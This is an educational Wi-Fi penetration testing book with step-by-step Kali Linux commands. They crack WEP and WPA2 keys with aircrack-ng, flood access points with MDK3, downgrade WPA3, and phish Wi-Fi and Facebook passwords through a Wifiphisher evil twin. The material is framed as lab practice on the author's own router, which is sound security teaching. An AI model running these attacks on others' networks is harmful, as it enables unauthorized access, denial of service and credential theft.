Lab Setup

Hardware and software requirements

Kali Linux VM installation
Setting up the wireless adapter
Wireless overview
IEEE802.11 standard
802.11 topologies
Wireless Network Threats
Wireless Network Security Protocols
WEP
WPA1 & WPA2
WPA3
Wireless Penetration Test
Recommended Hardware
Wireless Sniffing
Create Password list with Crunch
Crack Wi-Fi network
WEP password cracking with aircrack-ng suite
WPA/WPA2 Exploits
Denial of Service (DOS) Attacks
Crack WPA3
Automated Wi-Fi (WPA2/WPS) cracking
Crack WPA2 using Fern Wi-Fi Cracker
Crack WPA2 using wifite
Man In The Middle attack with Wifiphisher
OceanofPDF.com
 Preface

Like any major technological advance today, there is a risk of hacking,

whether remotely or locally your Wi-Fi connection is now the favorite prey
of hackers.

Better knowledge of potential Wi-Fi vulnerabilities improves the protection

of the networks we manage.
The methods and tools used in this book are for educational purposes only,
this book teaches you how to test the security of your own home wireless
network.

You can download the virtual machine used in this book at

https://www.mediafire.com/folder/0vpyh3638h0fm/Wifi_Book

Book cover designed by Jameson Fortin / [email protected]

OceanofPDF.com
 ACRONYMS

AES: Advanced Encryption Standards

AP: Access Point.

ARP: Address Resolution Protocol.

BS: Base Station.

BSS: Basic Service Set

DoS: Denial of Service.

EAP: Extensible Authentication Protocol.

EAPOL: Extensible Authentication Protocol over LAN.

GMK: Group Master Key

GTK: Group Temporal Key.

IEEE: Institute of Electrical and Electronics Engineers.

KCK: Key Confirmation Key.

KEK: Key Encryption Key.

LAN: Local Area Connection.

MAC: Media Access Control.

MIC: Message Integrity Code.

PMK: Pairwise Master Key

PSK: Pre-Shared Key

PTK: Pairwise Transient Key

RSNA: Robust Security Network Association.

TK: Temporal Key.

TSN: Transaction Security Network.

WEP: Wired Equivalent Privacy.

Wi-Fi: Wireless Fidelity.

WLAN: Wireless Local Area Network.

WPAN: Wireless Personal Area Network.

WPA: Wi-Fi Protected Access.

OceanofPDF.com
 Lab Setup

Hardware and software requirements

Windows 10 laptop with at least 8Gb RAM with kali 2019.4 (undercover)

Any Wi-Fi Access Point (in this book we use an old Linksys WRT160N
V3 router that support WEP, WPA/WPA2), it is not recommended to test on
neighbor WIFI, it is illegal, always use your own network for testing
purpose.

An alfa 1900 adapter and Alfa AWS360NH to make the test.

A brand new Access Point Netgear 4-stream Wi-Fi 6 Router to test the new
WPA3

Aireplay-ng - Aireplay-ng is included in the aircrack-ng package and is

used to inject wireless frames. Its main role is to generate traffic for later
use in aircrack-ng for cracking WEP and WPA-PSK keys. Aireplay-ng has
many attacks that can deauthenticate wireless clients for the purpose of
capturing WPA handshake data, fake authentications, interactive packet
replay, hand-crafted ARP request injection, and ARP-request reinjection.

Airodump-ng - Airodump-ng is included in the aircrack-ng package and is

used for packet capturing of raw 802.11 frames. It is ideal for collecting
WEP IVs for use with aircrack-ng.

Aircrack-ng - Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking

program that can recover keys once enough data packets have been
captured. It implements the standard FMS attack along with some
optimizations like KoreK attacks, as well as the all-new PTW attack, thus
making the attack much faster compared to other WEP cracking tools.

Fern wifi cracker - Fern wifi Cracker is a wireless security auditing and
attack software program written using the Python Programming Language
and the Python Qt GUI library, the program is able to crack and recover
WEP/WPA/WPS keys and also run other network based attacks on wireless
or ethernet based networks.

Wifite – aims to attack multiple WEP, WPA, and WPS encrypted networks
in a row.

Wireshark – Is an open source packet analyzer which is used for network

troubleshooting, analysis, software, and communication protocol
development.

Mdk3 - MDK is a proof-of-concept tool to exploit common IEEE 802.11

protocol weaknesses.

Wifiphisher - is a rogue Access Point framework for conducting Wi-Fi

security testing.

OceanofPDF.com
Kali Linux VM installation

1- Download and install VirtualBox

2- Download the Kali Linux VirtualBox 64-Bit .ova (2019.4) file at
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-
image-download/#1572305786534-030ce714-cc3b
3- Double click the .ova file and click Import
4- Configure the network adapter (Right click on your Kali VM in
VirtualBox Manager and click settings)

5- It is recommended to change the default Kali password.

Password : P@ssword-2020

Launch kali Linux VM

Setting up the wireless adapter

Setting up the Alfa AC1900 wireless adapter

1- Install the driver that come with the adapter in windows 10

 2- Plug in the alfa card in the laptop
3- Install the driver in our Kali Linux VM.
a) Download the driver for linux
git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git

b) Build dependencies
apt-get install build-essential
apt-get install bc

apt-get install libelf-dev

c) Install the driver with dkms (This is a system which will

automatically recompile and install a kernel module when a new
kernel gets installed or updated)
apt-get install dkms
d) Install the driver with the following command
./dkms-install.sh

4-

connect the WIFI adapter card in VirtualBox

Right click on this icon located at the bottom right of the kali virtual
machine and click the adapter “Realtek 802.11ac NIC”

5- Test the adapter using the command iwconfig

iw list

Note: If you build your lab in a windows 7 laptop with the alfa AWS360NH
adapter you do not need to install driver, because this model is a plug-and-
play device.

Setting up the Alfa AWS360NH wireless adapter

1- Download unzip and install the driver for windows 10
(windows_vista_7_8_10_32_64bit.zip) using the following link
https://files.alfa.com.tw/?
dir=%5B1%5D%20WiFi%20USB%20adapter/AWUS036NH/Windows
2- Plug in the alfa card in the laptop
3- Connect the Wi-Fi adapter card in VirtualBox

OceanofPDF.com
 Wireless overview

Wireless networking (WLAN) is a set of communication and security

technologies that operate over a standard set of radio frequencies for
communication. Using these frequencies, a number of standards have been
defined, enabling multiple vendors to interoperate.
Wireless networks offer great benefits such as flexibility, portability, and
low installation cost.

IEEE802.11 standard

The class of standards for wireless LANs known as IEEE 802.11 are the
ones mainly used today.

Wi-Fi (Wireless Fidelity): A wireless technology that connects computers

without cables.

Wireless networks allow computers to “talk” to each other by broadcasting

and receiving radio waves.

Standard Frequency Data rate

802.11a 5 GHz 54 Mbps
802.11b 2.4 - 5 GHz unlicensed Up to 11 Mbps
spectrum

802.11g 2.4 GHz Up to 54 Mbps

 802.11n (multiple 2.4 - 5 GHz range Up to 3.47 Gbps
antennas)

802.11ac 5 GHz Up to 6 Gbps

802.11ad 60 GHz Up to 7 Gbps

802.11ax (Wi-Fi 6) 2.4 – 5 - 5.6 GHz Up to 9 Gbps

Wireless Mode

• Infrastructure mode
• Ad hoc mode

802.11 topologies
Three basic topologies for WLANs
-IBSS: Independent Basic Service Set

-BSS: Basic Service Set

-ESS: Extended Service Set

IBSS Topology

IBSS: Independent Basic Service Set

Peer-to-peer or ad-hoc network

Stations communicate directly with one another; must be within range

of each other, generally are not connected to a larger network.
 No Access Point

BSS Topology

BSS: Basic Service Set (a.k.a. “cell”) contains:

wireless hosts
access point (AP): base station

Infrastructure mode

An Access Point connects between clients

Each station has one link at a time, via a unique Access Point.

ESS Topology

ESS: Extended Service Set

Infrastructure mode

Consists of overlapping BSSs (each with an Access Point)

DS (Distribution System) connects APs together, almost always

Ethernet

ESS allows clients to seamlessly roam between Aps

 ESS hides the mobility of the mobile stations from everything outside
the ESS

Access Points (APs)

Usually connects wireless and wired networks

Consists of a radio, a wired network interface

Wireless networks are identified using a Service Set Identifier (SSID)

-SSID defines which Wireless networks a station wishes to associate itself
with.

-Each Access Point is configured with a SSID.

-Client must be configured with the right SSID to be able to associate itself
with a specific AP.

SSIDs come in several forms:

SSID: generic term, referring to the wireless network name

BSSID: Basic SSID - The MAC address of the Access Point

ESSID: Extended SSID - a name applied to one or more APs providing the
same service to access a wired LAN.

Note: In Canada and USA there are eleven 802.11 channels, only channels
1, 6, 11 are non-overlapping.

OceanofPDF.com
 Wireless Network Threats

Malicious or accidental association

A hacker can force an unsuspecting user station to connect to a spoofed

802.11 network (malicious access points), or alter the configuration of the
station to operate in an ad-hoc networking mode.
As the victim’s user station broadcast a request to associate with an access
point, the hacker’s soft access point responds to this request and establishes
a connection between the two. Next, the soft access point provides an IP
address to the victim’s user station.

Identity theft (Mac spoofing)

A hacker can capture the MAC address of a valid user with some software
tools, a hacker can change his MAC address to the victim’s MAC address
using some spoofing utility. Once this has been done, the hacker can
connect to the wireless LAN, bypassing any MAC address filtering.

Man-in-the-middle attacks

A hacker can easily convert a wireless device into a soft AP, and position
that access point in the middle of the communication session.

The more sophisticated MITM attack preys upon challenge and handshake
protocols to perform a de-authentication attack. The de-authentication
attack knocks a user from an access point, causing the user to search for a
new access point with which to connect. Now the hacker, with a different
wireless interface, connects to the wireless LAN, passing all authentication
traffic to the real wireless network.

Denial of service attacks (Dos)

DoS attacks can be directed against a specific user station to prevent that
station from communicating from the network, against a specific AP to
prevent stations from connecting with it, or as an attack against all network
devices.

The most common DoS attacks on IEEE 802.11 wireless network:

-Deauthentication frames

-Authentication request frames

-Association request frames

Network Injection Attacks

Network Injection Attacks, exploits improperly configured wireless LANS

or rogue access point to target the entire network.

OceanofPDF.com
 Wireless Network Security Protocols

Wireless Encryption secures wireless network with an authentication

protocol. It requires a password or network key when a user or device tries
to connect.
WEP

Wired Equivalent Privacy Protocol was developed way back in 1997, and
finalized in 1999. WEP encrypts data using the RC4 encryption algorithm
with a 64-bit or 128-bit key to encrypt data.

WEP Authentication Modes

Open System

- Client does not need to provide any credentials

- Immediate association with access point

- but can only send and receive info if using correct key
Shared Key

Client begins by sending an association request to the AP

AP responds with a challenge text (unencrypted)

Client, using the proper WEP key, encrypts text and sends it back to the
AP.

If properly encrypted, AP allows communication with the Client.

802.11 WEP frame

The IV that is sent with the ciphertext contains two fields: = IV & KeyID

WEP Key Management

– Each entity in the wireless LAN (AP, Clients) is configured

with four static WEP keys
KeyIDs 0,1,2,3

– The keys are shared by an Access Points and all the wireless
station accessing it.
– The ID of the key used for encryption/decryption appears in
the packet WEP header.

RC4 key
 • Standard - 24 + 40 = 64-bit RC4 key
• Vendors - 24 + 104 = 128-bit RC4 key
• We will see that key-size does not prevent the attacks.

Checksum

CRC-32 - detecting single random bit errors

If CRC is correct, WEP assumes:

Packet has not been modified

Packet is from authorized user

RC4

Developed by Rivest in 1987

Kept as a trade secret (but leaked in 1994)

Key can be between 1 and 256 bytes

Used as a simple and fast generator of pseudo-random sequences

of bytes (to be used as “one-time-pad”)

Should discard first 256 bytes of generated pad

Passes all usual randomness tests

OceanofPDF.com
WPA1 & WPA2

Wi-Fi Protected Access is a trade name applied to certain aspects of the

802.11i standard. WPA1 relies on protocol known as the Temporal Key
Integrity Protocol (TKIP), with several security features that are designed to
avoid the pitfalls of the earlier WEP.

WPA can be deployed with either pre-shared master keys loaded into every
access point and client, or with infrastructure that distributes keys using the
Protected Extensible Authentication Protocol (PEAP).

WPA come in two flavors: WPA1 and WPA2

WPA1 implements a subset of 802.11i functionality, exchanging some degree

of security so that it can run on older access points without very much
processing power. WPA1 uses TKIP, with RC4 as its core encryption
algorithm to protect packets going across the network.

WPA2 implements full 802.11i functionality, using the more computationally

complex but also likely more secure AES encryption algorithm. WPA2 uses
AES in a mode called CCMP (Counter Mode with Cipher Block Chaining
Message Authentication Code Protocol).

Note: WPA-PSK (Pre-Shared key) is used for small office and home and
does not use an authentication server.

WPA Cryptographic Algorithms and Protocols

Name Type Std Description
Keyed Hash Hash WPA Performs message
Message authentication/verification, using a
Authentication cryptographic hash function, using a
Code secret key. The cryptographic
(HMAC) strength of the hash depends upon the
underlying hash function (e.g. Sha1)
and the size of the key.

Rivest Cipher Stream WPA Variable key sized (typically 256

4 (RC4) Cipher bits) stream cipher. A random bit
stream is XOR’d with plaintext to
create an encrypted stream. The key
schedule is created by first
initializing the 256-bit vector and
then performing a pseudo random
key generating algorithm on the
vector.
Temporal Key Encryption WPA Specifies a newly generated key for
Integrity and MIC each encrypted packet, a Message
Protocol Integrity Check (MIC) for each
(TKIP) packet, and new key generation for
each session. Uses the RC4 stream
cipher with 128-bit keys for
encryption and 64-bit keys for
authentication.

Advanced Block WPA2 Block cipher with a fixed block size

Encryption Cipher of 128 bits and a key size of 128, 192
Standard or 256 bits. The algorithm typically
(AES) operates on a 4x4 byte matrix,
applying operations: add round key,
substitute bytes from a look up table,
shift rows, and mix columns over
multiple rounds.
Cipher Block MIC WPA2 Uses AES cipher blocks in a chain to
Chaining perform integrity checking of the
Message message. Each subsequent block is
Authentication dependent upon the proper
Code (CBC- encryption of the preceding block.
MAC)
Counter Mode Encryption WPA2 Performs packet encryption, using
CBC MAC and MIC AES and message
Protocol authentication/integrity checking,
(CCMP) using CBC-MAC. It is equivalent in
function to TKIP.

WPA Encryption Algorithm (TKIP)

WPA2 4-way Handshake

The 4-way handshake is the process of exchanging 4 messages between an
Access Point (AP) and the client to generate communication keys.

WPA2 deauthentication

OceanofPDF.com
WPA3

WPA3 is the next generation of Wi-Fi security and provides cutting-edge

security protocols to the market. WPA3 adds new features to simplify Wi-Fi
security, enable more robust authentication, deliver increased cryptographic
strength for highly sensitive data markets, and maintain resiliency of
mission critical networks.

WPA3 use the latest security method – Disallow outdated legacy protocols
– Require use of protected Management Frames (PMF)

WPA3-Personal

WPA3 personal brings better protections to individual users by providing

more robust password-based authentication, even when users choose
passwords that fall short of typical complexity recommendations. This
capability is enabled through Simultaneous Authentication of Equals (SAE),
which replaces Pre-shared key (PSK) in WPA2-Personal.

The technology is resistant to offline dictionary attacks.

WPA3-Enterprise

WPA3-Enterprise builds upon WPA2 and ensures the consistent application

of security protocols across the network.

WPA3-Enterprise also offers an optional mode using 192-bit minimum-

strength security protocols and cryptographic tools to better protect
sensitive data:
 Authenticated encryption: 256-bit Galois/Counter Mode
Protocol (GCMP-256)
Key derivation and confirmation: 384-bit Hashed Message
Authentication Mode (HMAC) with secure Hash algorithm
(HMAC-SHA384)
Key establishment and authentication: Elliptic Curve Diffie-
Hellman (ECDH) exchange and Ellipitic curve Digital Signature
Algorithm (ECDSA) using a 384-bit elliptic curve.
Robust management frame protection: 256-bit
Broadcat/Multicast Integrity Protocol Galois Message
Authentication Code (BIP-GMAC-256)

The 192-bit security mode offered by WPA3-Enterprise ensures the right

combination of cryptographic tools are used and sets a consistent baseline
of security within a WPA3 network.

OceanofPDF.com
 Wireless Penetration Test

Recommended Hardware

ALFA AWUS036NEH Long Panda Wireless Alfa

Range WIRELESS 802.11b/g/n PAU09 N600 Dual AWUSO36NH
Wi-Fi USB Adapter Band (2.4GHz and High Gain USB
5GHz) Wireless N Wireless G / N
USB Adapter Long-Rang WiFi
W/Dual 5dBi Network Adapter
Antennas
TP-Link Nano USB Wifi Alfa Alfa Long-Range
Dongle 150Mbps High Gain AWUS036NHA - Dual-Band
Wireless Network Adapter Wireless B/G/N AC1200 Wireless
USB Adaptor - USB 3.0 Wi-Fi
802.11n - 150Mbps Adapter w/2x
- 2.4 GHz - 5dBi 5dBi External
Antenna - Long Antennas -
Range - Atheros 2.4GHz
Chipset 300Mbps/5GHz
867Mbps -
802.11ac & A, B,
G, N
Alfa AC1900 WiFi Adapter - TRENDnet
1900 Mbps 802.11ac Long- AC1900 High
Range Dual Band USB 3.0 Wi- Power Dual Band
Fi Network Adapter w/4x 5dBi Wireless USB
External Dual-Band Antennas Adapter, TEW-
809UB, Increase
Extend WiFi
Wireless Coverage,
High Gain
Antennas

OceanofPDF.com
Wireless Sniffing

Sniffing is a process of monitoring and capturing all data packets passing

through a given network.

There are numerous sniffing tools available that can gather packets from a
wireless interface (Wireshark, Kismet).

When sniffing using a wireless interface, the mode of that interface

becomes very important.
Wireless interfaces can be in any one of several modes:

Master mode – the wireless interface acts like an access point, responding
to request for access to the network.

Ad-hoc mode – the wireless interface allows for peer-to-peer connections

with other wireless clients.

Managed mode – the wireless interface acts like a wireless client, able to
connect to access points operating in master mode.

Monitor mode – the wireless card passively grabs wireless frames from
one wireless channel and passes them to the operating system, without
decoding them and pulling out the embedded protocol.

In monitor mode we can sniff a wireless network very quietly, but we

cannot transmit packets on the network.

OceanofPDF.com
Create Password list with Crunch

Password cracking is made easier by a wordlist that can attempt thousands

of potential passwords each second. The wordlist can be used for a
dictionary attack when it contains words that are likely to succeed.

Crunch

Crunch is a wordlist generator where you can specify a standard character

set or a character set you specify. crunch can generate all possible
combinations and permutations.

Crunch <min> <max> [options]

Length 4 to length 6, using letters

Crunch 4 6 -o file.txt

8-character passwords using lower case letters, upper case letters, and
numbers

crunch 8 8 -f /usr/share/crunch/charset.lst mixalpha-numeric

8-character passwords using lower case letters, upper case letters, numbers,
symbols, and even white space

crunch 8 8 -f /usr/share/crunch/charset.lst mixalpha-numeric-symbol14-

space

To be honest, I do not advise you to generate such a heavy password list.

The file charset.lst contains a list of character set ready to be used in your
password list.

OceanofPDF.com
Crack Wi-Fi network

WEP weakness

Clear text initialization vectors : with the IV for each packet sent in clear
text in the packet itself, an attacker who samples traffic already knows a big
portion of the key used in RC4, either 24 or 64 bits or 24 or 1208 bits,
giving the attacker quite a head-start in breaking the key.

The IVs are too short (only 24 bits)

Weak integrity checksum: WEP uses the cryptographically weak CRC 32
checksum to verify the integrity of packets. Attackers can generate arbitrary
packets that all have the same CRC32 checksum, making it easier to inject
packets into networks.

No replay protection: There is nothing unique in a WEP protected packet

that is known to the attacker, other than the original clear text and the key.
The only unique value is the IV, which the attacker knows from the sampled
packet, and even that unique number is not unique enough, with collisions
occurring frequently.

Known clear text allows for attack against WEP keys: Almost every
wireless packet includes embedded header in format known to the attacker,
which allows the attacker to try to guess the WEP key, decrypt the packet,
and look for this clear text bytes from the embedded header in the result to
see if the key guess was successful.

WEP password cracking with aircrack-ng suite

We will set up a we network for practical test. The wireless router we will
use is a Linksys WRT160N V3 which have my android phone connected to
it and my windows 10 laptop.

Attack will be performed with kali 2019-4 undercover. The hardware we

will use for the test is an Alfa AC1900 adapter compatible with kali linux.

Step 1: Let’s configure the Linksys router with WEP security mode

Step 2: Plug in our alfa adapter to the windows 10 laptop and next connect
it on Kali Linux Virtual Machine.

Step 3: Put the wireless interface into monitor mode.

airmon-ng start wlan0

Step 4: Find the BSSID and channel used with the command airodump-ng
wlan0

Note the BSSID: 68: 7F: 74: 30: 95: BA of our wifi “Mywifi”.

Press Ctrl+C to stop capture

Step 5: Monitor the traffic of the target network in our case “Mywifi”
airodump-ng -c 11 --bssid 68:7F:74:30:95:BA -w wecap wlan0
Step 6: In order to generate traffic, we will launch the Arp request replay
attack

Open a second terminal an type the command aireplay-ng --arpreplay -b

68:7F:74:30:95:BA -h 3C:6A:A7:AC:20:A6 wlan0

-b bssid: MAC address, Access Point

-h smac: Set Source MAC address

In the monitor traffic terminal, which captures the data packets, you should
see the packets in the #Data column raise exponentially.

Step 7: Crack the WEP key

Open a third terminal and launch aircrack on the wecap file with the
command aircrack-ng -b 68:7F:74:30:95:BA wecap-08.cap
OceanofPDF.com
Break WEP without a victim client with the chopchop attack
Chopchop Attack: This attack was proposed with the pseudonym KoreK in
2004. The attacker can decrypt the last s bytes of plaintext of encrypted
packet by sending an average of s*128 packets on the network. Integrity
Check Value (ICV) is appended with the plain text and chopchop attack
exploits the insecurity of this four byte checksum. The root key is not
revealed in this attack. Various access points can easily identify between
correct and incorrect checksum of encrypted packets. The attacker can use
this principle for packet decryption. The attacker chops one byte from end
of captured packet, guesses the packet’s last byte and modifies the
checksum accordingly and sends the packet to access point. If the guess was
correct, the access point accepts the packet and the attacker now knows the
last byte of plaintext. So, attacker proceeds to determine the second last
byte. In case, the guess of last byte was incorrect then, the access point
silently discards the packet and attacker makes a different guess for last
byte. Using this methodology, there has been a significant reduction in
amount of time required to crack WEP keys.

Step 1: Put the wireless interface into monitor mode

airmon-ng start wlan0

Step 2: Monitor the traffic of the target network

Find the BSSID and channel used with the command airodump-ng wlan0

airodump-ng -c 11 --bssid 68:7F:74:30:95:BA -w chopatt wlan0

Step 3: Fake authenticate to the access point

aireplay-ng -1 0 –a 68:7F:74:30:95:BA wlan0

-a bssid: set Access Point MAC address

-h: Source MAC address

-1: fake authentication with AP

0: All stations

-4: decrypt/chopchop WEP packet

Step 4: Launch the chopchop attack

Open a new terminal and type

aireplay-ng -4 –b 68:7F:74:30:95:BA -h 00:C0:CA:A6:57:99 wlan0

-b bssid: MAC address, Access Point

At the prompt asking to “Use this packet” type y and press Enter
Note: if it says “The chopchop attack appears to have failed. Possible
reasons:” try again

If the fragmentation attack works you should see

Step 5: Forge an arp request packet using packetforge-ng

packetforge-ng -0 –a <targetMac> -h <yourMac> -k 255.255.255.255 –l

255.255.255.255 –y <XOR packet from chopchop attack> -w
mypacket.cap

Step 6: Send out the forged packet

aireplay-ng -2 -h 56:58:D4:70:3B:AD -r mypacket.cap wlan0

-2: Interactive frame selection

-r file: extract packets from this pcap file

In the monitor traffic terminal, which captures the data packets, you should
see the packets in the #Data column raise exponentially. Wait for some
more data to be written.

Step 7: Open a third terminal and launch aircrack on the chopatt file
located in the root directory with the command
aircrack-ng chopatt-02.cap

WEP encryption does not provide sufficient wireless network security,

therefore it is not recommended to use WEP.

R.I.P. WEP

OceanofPDF.com
WPA/WPA2 Exploits

There are a number of exploits available against Wi-Fi Protected Access

(WPA). These include both data integrity/confidentiality attacks and Denial
of Service (DOS) attacks.
Data Integrity/Confidentiality Attacks
Pre-Shared Key (PSK) Attacks
Pre-Shared Key (PSK) Monitoring Attack
Pre-Shared Key (PSK) Dictionary Attack
Rivest Cipher 4 (RC4) Attack
Denial of Service (DOS) Attacks
Wi-Fi Protected Access (WPA) Protocol Shutdown Attack
Radio Frequency (RF) Jamming Attack

WPA-PSK attack

WPA-PSK is prone to offline dictionary attack since information has to be

broadcasted for verification of session key. In order to generate PMK,
passphrase, Service Set Identifier (SSID) and SSID length are fed into
hacking algorithm.

WPA2 password attack process

1) Send a deauthentication frame using airplay-ng which made the

client station to lose network connection and forces a
reauthentication.
 2) During this time, we use airodump to capture the 4-way
authentication handshake.

Note : WPA2 networks are vulnerable only if the password can be guessed.

WPA password cracking with Pre-Shared Key (PSK) Dictionary

Attack)

If the attacker does not know the Pre-Shared Key (PSK), they may perform
the Pre-Shared Key Dictionary attack to attempt to determine the key. For
user selected pass phrases (PSK)s of less than 20 characters, this type of
attack is expected to be successful.
In this attack, the pass phrase can be determined, using a dictionary of
common pass phrases, and then running them through a well-known
algorithm for generating Pairwise Master Key (PMK)s.

Method 1: Passive attack (Wait for a client to connect)

Step 1: Let’s configure the Linksys router with WPA-PSK security mode
Open a browser and enter the router admin http://192.168.1.1/ with default
user/password admin/admin and we choose channel 11 as operating
channel.
Step 2: Connect our alfa adapter to the windows 10 laptop and next connect
it on Kali Linux.

Note: The windows 10 host laptop is connected to the network

“MyWifi”
Step 3: Put the wireless interface into monitor mode.

airmon-ng start wlan0

Step 4: Capture networks packets

Find the BSSID and channel used with the command airodump-ng wlan0

Monitor the traffic of our target with the following command:

airodump-ng -c 11 --bssid 68:7F:74:30:95:BA -w Wapcap wlan0

-c number: channel number

-w <prefix>: Dump file prefix

Step 5: Capture the handshake

Legitimate clients should then be dissociated, forcing them to initiate a new

association and allowing us to capture 4-Way Handshake messages.

Open a second terminal and type aireplay-ng -0 1 –a 68:7F:74:30:95:BA

wlan0

In the monitor traffic terminal (the first one), you should see the captured
handshake.

Step 6: Perform dictionary attack on the cap file

Open a third terminal and type aircrack-ng –w <dictionary> <cap file>

aircrack-ng –w Wapcap.cap
We found the password: password777 in our password.txt file in 1 minute, 3
seconds

Method 2: Active attacks (kick a user off and wait for him to reconnect)

Do the same for Step 1 through Step 4

Step 5: Capture the handshake

Open a terminal and type aireplay-ng --deauth 1 –a 68:7F:74:30:95:BA -c

3C:6A:A7:AC:20:A6 wlan0

--deauth count: deauthenticate 1 or all stations (-0)

-a bssid: set Access Point MAC address

-c dmac: set Destination MAC address

In the monitor traffic terminal (the first one), you should see the captured
handshake.
Step 6: Perform dictionary attack on the cap file

Open a new terminal and type aircrack-ng –w <dictionary> <cap file>

We found the password: password777 in our password.txt file in 1 minute, 1

second.

OceanofPDF.com
Denial of Service (DOS) Attacks

MDK3 (Murder Death Kill 3) is a proof-of-concept tool to exploit common

IEEE 802.11 protocol weaknesses

Mdk3 syntax

Mdk3 <interface> <test_mode> [test_options]

Perform DOS Attack with MDK3

Step 1: Put in monitor mode

Step 2: Jam the network

SSID flooding or beacon flooding with mdk3

WIFI created

b: Beacon Flood Mode – Send beacon frames to show fake APs at clients.

-c: Channel number

-n <ssid>: Use SSID <ssid> instead of randomly generated ones

DOS attack method with MDK3

I. Authentication Flooding: Flood the Access Point with

authentication request

Open a second terminal and type the following command

Mdk3 wlan0 a -a 68:7F:74:30:95:BA

-a <AP_MAC>: Only test the specified AP

wait until the AP stop working, you will be disconnected from the Wi-Fi
network

I. Deauthentication Flooding: Target one or all users on a specific

BSSID

Mdk3 wlan0 d -b listofmac

d: Deauthentication/ Disassociation Amock mode – Kicks everybody found

from AP
OceanofPDF.com
Crack WPA3

Wi-Fi 6: Wi-Fi 6 (IEEE 802.11ax standard) is the next generation standard

in WIFI technology, Wi-Fi 6 provides the capacity, efficiency, coverage, and
performance required by users today in wi-fi environments.

Connect to the new netgear router

1- In a browser enter www.routerlogin.net

2- Enter default username and password of your router
3- Once connected go to Wireless and select WPA3-Personal
Our router gives us the option to select either WPA2-psk [AES] or WPA-
PSK [tkip + WPA2-PSK [AES] or WPA3.

The new WPA3 security protocol successor to WPA2 aims to better protect
the wireless links established between an AP and a Client. With WPA3, it is
almost impossible to crack the password of a computer network. However,
when it was released, 2 researchers specializing in computer security, Eyal
Ronen and Mathy Vanhoef, discovered a way to exploit vulnerabilities.
As of the publication of this book, the vulnerabilities discovered have
already been the subject of software patches.

Downgrade Attack scenario

The netgear router gives us the possibility to activate Guess mode, in this
mode we will test the downgrade attack of WPA3.

WPA3 backwards compatibility is known as WPA3-Transition mode, this

mode allows a network to operate WPA3 and WPA2 protection with the
same password.
1- Go to Guest Network and check Enable Guest Network
2- In Security Options – Profile select WPA2-Personal[AES]+ WPA3-
Personal and click Apply
Since our Guest wifi gives us the possibility of downgrading to WPA2 for
old devices, we can use the previous methods used in this book to crack
WPA2 Wi-Fi. Cracking the password of the old protocol gives us access to
the password that allow to connect to the new one “WPA3”.

OceanofPDF.com
 Automated Wi-Fi (WPA2/WPS) cracking

Crack WPA2 using Fern Wi-Fi Cracker

Fern Wi-Fi Cracker is a wireless security auditing and attack software

program written using the Python Programming Language and the Python
qt GUI library. This program is able to crack and recover WEP, WPA, WPS
keys and also run other network-based attacks on wireless or ethernet based
networks

1- Go to Kali menu and select Wireless Attacks -> Fern Wifi Cracker

2- Select the wireless interface and click Scan for Access Points
button
3- Click on Wi-Fi WPA button which show a list of detected Access
Point.
4- Select “MyWifi” access Point, the others are from my neighbor,
and browse for the password files “password.txt”
5- Click the attack button at the upper right and wait for the password
to be cracked.

6- Click on Ok button for these two windows

 7- In the “Attack Panel” window, the message 1 keys cracked
appears, then close the window.

8- In the main window of Fern Wifi Cracker click the “Key Database”
button.

The Fern-key Database window appears with information about our AP as

well as the cracked password.

OceanofPDF.com
Crack WPA2 using wifite

1) In kali go to Wireless Attacks and open wifite

2) Install hcxdumptool with the following command apt-get install
hcxdumptool
Hcxdumptool: tool to run several tests to determine if Aps or clients
are vulnerable.

3) Install hcxpcaptool
Git clone https://github.com/ZerBea/hcxdumptool.git
4) Change directory with the command cd hcxdumptool
5) Type make
6) Type make install

7) Enter the command wifite -I wlan0 –verbose –random-mac –

clients-only -c 11 –wpa –dict /usr/share/wordlists/password.txt

Wifite found our Wifi “MyWifi”

8) Press Ctrl+C to select the desired AP in our case MyWifi, press
Enter and wait for wifite to crack the password

9) If wifite successfully crack the password, you should see the PSK
Password: password777

OceanofPDF.com
Man In The Middle attack with Wifiphisher

Wifiphisher is a rogue Access Point framework for conducting Wi-Fi

security testing. Using Wifiphisher, penetration testers can easily achieve a
man-in-the-middle position against wireless clients by performing targeted
Wi-Fi association attacks. Wifiphisher can be further used to mount victim-
customized web phishing attacks against the connected clients in order to
capture credentials or infect the victim stations with malwares.

How Wifiphisher works?

Wi-Fi phishing consists of two steps:

Step 1:

The first step involves the process of associating with Wi-Fi clients
unknowingly, or in other words, obtaining a man-in-the-middle (MITM)
position. Wifiphisher uses a number of different techniques to achieve this
including:

Evil Twin, where Wifiphisher creates a fake wireless network

that looks similar to a legitimate network.
KARMA, where Wifiphisher masquerades as a public network
searched for by nearby Wi-Fi clients.
Known Beacons, where Wifiphisher broadcasts a dictionary of
common ESSIDs, that the around wireless stations have likely
connected to in the past.
At the same time, Wifiphisher keeps forging “Deauthenticate” or
“Disassociate” packets to disrupt existing associations and eventually lure
victims using the above techniques.

Step 2:

There are a number of different attacks that can be carried out once
Wifiphisher grants the penetration tester with a man-in-the-middle position.
For example, the tester may perform data sniffing or scan the victim
stations for vulnerabilities.

Network manager scenario

1- Connect the Alfa 1900 adapter and the alfa AWS360NH

2- Put desired adapter in monitor mode
3- Change the directory with the command cd wifiphisher
4- Run the tool by typing wifiphisher -aI wlan1 -eI wlan0
-aI interface : Manually choose an interface that supports AP mode
for spawning an AP

-eI interface : Manually choose an interface that supports monitor

mode for running the extensions.

5- Select the desired Wi-Fi in our case MyWifi.

6- Select the type of scenario

7- Wifiphisher will attempt to send deauth packets to the victim

8- Once the victim (my Samsung galaxy phone) connects to the fake
AP, a window appears asking him to insert the wifi password.

9- The password will be displayed in clear in the window that

follows.
 10- Press Esc to quit wifiphisher, once again the password is
displayed in clear.

Capturing credentials from social networks (Facebook)

1- Select OAuth Login scenario

2- Wifiphisher will attempt to send deauth packets to the victim
3- Once connected a new window appears asking user to enter a
Facebook account.
The victim's Facebook account email and password are displayed in clear
text in the following window.

4- Press Esc to quit wifiphisher, once again the password is displayed

in clear

OceanofPDF.com
From same author

Amazon Book Store

OceanofPDF.com